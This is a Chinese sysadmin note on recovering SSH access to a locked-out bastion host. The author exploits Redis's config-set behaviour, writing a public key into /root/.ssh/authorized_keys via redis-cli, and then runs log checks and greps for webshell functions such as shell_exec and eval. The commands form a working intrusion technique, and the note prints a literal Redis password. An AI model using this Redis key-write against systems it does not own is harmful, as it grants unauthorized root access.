现象:堡垒机突然登录不上去了
解决:通过redis 远程+密码登录,利用redis漏洞登录上去,修复.ssh/authorized_keys
Redis未授权访问导致可远程获得服务器权限
找一台可以登录redis的远程机器:
# ssh-keygen -t rsa
# cat .ssh/id_rsa.pub
…
# /usr/local/redis/bin/redis-cli -h x.x.x.x
> auth QW@FAEBSETYDWESE!@#
> config set dir /root/.ssh/
> config set dbfilename authorized_keys
> set xxxx “…”
> save
> exit
正常登录后,重启redis,还原正常的.ssh/authorized_keys
分析:
1.redis有密码和IP白名单,黑客入侵服务器可能性较小
2.查找系统日志
# history
# tail -9500 /var/log/secure |grep -v zabbix |more
# tail -19000 /var/log/messages | grep -v “TCP” |grep -v “ratelimit”|more
# last -20
# find /var/www/apache/project/xxxx -name “*.php” |xargs grep “shell_exec” |more
# find /var/www/apache/project/xxxx -name “*.php” |xargs grep “passthru” |more
# find /var/www/apache/project/xxxx -name “*.php” |xargs grep “eval” |more
# find /var/www/apache/project/xxxx -name “*.php” |xargs grep “fsockopen” |more